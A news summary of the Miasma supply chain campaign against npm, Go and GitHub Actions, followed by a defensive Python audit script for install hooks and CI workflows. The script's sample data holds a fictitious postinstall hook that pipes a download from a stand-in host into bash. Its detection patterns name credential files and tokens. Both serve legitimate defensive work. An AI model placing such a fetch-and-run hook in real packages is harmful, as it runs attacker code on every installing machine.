Miasma Malware Targets npm Packages and GitHub Actions in Supply Chain Attack
The Miasma malware campaign has expanded its software supply chain attacks, compromising additional npm packages and abusing GitHub Actions workflows, building on earlier campaigns involving the Mini Shai-Hulud and Hades malware families. Researchers observed malicious npm releases targeting the LeoPlatform and RStreams packages, and the campaign has also spread into the Go ecosystem, so it is no longer confined to a single language's package registry.

The attack pattern is the standard one for poisoned dependencies: malicious code is inserted into a legitimate package and published as a new release, and every downstream project that installs or updates that dependency runs the injected code. Abuse of GitHub Actions workflows gives the attackers a foothold in CI/CD pipelines, where they can automate further malicious publishing or exfiltrate the secrets and other sensitive data available to the workflow.

The campaign's continued adaptation is a reminder that package registries and CI systems are an attractive target for supply chain compromise. Pinning dependencies and actions, reviewing lockfile changes and install-time scripts, scoping CI credentials to the minimum needed, and monitoring for unexpected new releases of the packages a project depends on remain the practical controls for detecting and limiting this kind of attack.
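The two controls that matter most for the pattern described above, install-time scripts in npm packages and over-privileged or unpinned GitHub Actions workflows, are easy to check mechanically. The script below is an added example, not code from the original report or from any of the affected projects, and it carries no indicators for Miasma itself (the report publishes none). It is a generic hygiene audit: `audit_manifest` flags any package.json that declares a preinstall/install/postinstall/prepare script and rates the script body for patterns that are rare in legitimate build steps (remote fetch, pipe-to-interpreter, embedded base64, credential file access); `audit_workflow` flags workflow text that references actions by mutable tag instead of a full commit SHA, grants `write-all` permissions, or runs on `pull_request_target`. The package names, script bodies, workflow text and commit SHA in the sample input are all constructed for the demo; the heuristic pattern list is an assumption about what a poisoned install script tends to contain, not a published signature.

```python
"""Added example: lightweight npm install-script and GitHub Actions
workflow hygiene checks. Generic heuristics, not Miasma indicators."""
import json
import os
import re
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics for install-script bodies; not campaign IOCs.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "remote fetch"),
    (re.compile(r"\|\s*(sh|bash|node)\b"), "pipe-to-interpreter"),
    (re.compile(r"base64|atob\(|Buffer\.from\([^)]*,\s*['\"]base64"), "base64 payload"),
    (re.compile(r"\beval\s*\("), "eval"),
    (re.compile(r"\.(npmrc|git-credentials)\b|GITHUB_TOKEN|NPM_TOKEN"), "credential access"),
]


def audit_manifest(name: str, manifest: dict) -> List[str]:
    """Findings for one parsed package.json: any install-time hook is
    reported (INFO); hooks whose body matches a heuristic are HIGH."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        body = scripts.get(hook)
        if not body:
            continue
        hits = [label for rx, label in SUSPICIOUS if rx.search(body)]
        sev = "HIGH" if hits else "INFO"
        detail = f" ({', '.join(hits)})" if hits else ""
        findings.append(f"{sev} {name}: {hook} script{detail}: {body!r}")
    return findings


def walk_node_modules(root: str) -> List[str]:
    """Apply audit_manifest to every package.json under an installed tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue
        findings.extend(audit_manifest(manifest.get("name", path), manifest))
    return findings


USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text: str) -> List[str]:
    """Findings for one GitHub Actions workflow file (line-oriented scan,
    so it needs no YAML parser): unpinned actions, write-all token,
    pull_request_target trigger."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES_LINE.match(line)
        if m:
            ref = m.group(1)
            if not (ref.startswith("./") or ref.startswith("docker://")):
                action, _, version = ref.partition("@")
                if not FULL_SHA.match(version):
                    findings.append(f"line {lineno}: {action} pinned to mutable ref "
                                    f"{version or '(none)'!r}, pin to a commit SHA")
        stripped = line.strip()
        if re.match(r"permissions:\s*write-all", stripped):
            findings.append(f"line {lineno}: permissions: write-all, scope the token down")
        if re.match(r"^-?\s*pull_request_target\s*:?$", stripped):
            findings.append(f"line {lineno}: pull_request_target runs with repo secrets "
                            "against untrusted PR code")
    return findings


# Constructed sample input: fictitious package names, script bodies, and
# a made-up 40-hex SHA standing in for a real pinned commit.
SAMPLE_MANIFESTS: Dict[str, dict] = {
    "left-pad-ish": {"name": "left-pad-ish", "scripts": {"test": "node test.js"}},
    "build-helper": {"name": "build-helper", "scripts": {"prepare": "tsc -p ."}},
    "poisoned-dep": {"name": "poisoned-dep",
                     "scripts": {"postinstall": "curl -s https://example.invalid/x | bash"}},
}

SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@8f152de45cc7d5c1c0a9aee2f4bb0bde9f4f7f8b
      - run: npm ci
"""


def demo() -> Dict[str, List[str]]:
    """Run both audits over the constructed samples."""
    out = {name: audit_manifest(name, m) for name, m in SAMPLE_MANIFESTS.items()}
    out["workflow"] = audit_workflow(SAMPLE_WORKFLOW)
    return out


if __name__ == "__main__":
    for key, findings in demo().items():
        for finding in findings:
            print(key, "->", finding)
```

In CI, `walk_node_modules("node_modules")` after `npm ci` and `audit_workflow(open(path).read())` over `.github/workflows/*.yml` give a quick gate; a HIGH install-script finding or an unpinned third-party action should fail the job and be reviewed by a human, because install scripts are precisely where a poisoned release gets to run on every machine that pulls it.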
Original source — read the full reporting at the publisher:
Read on The Hacker News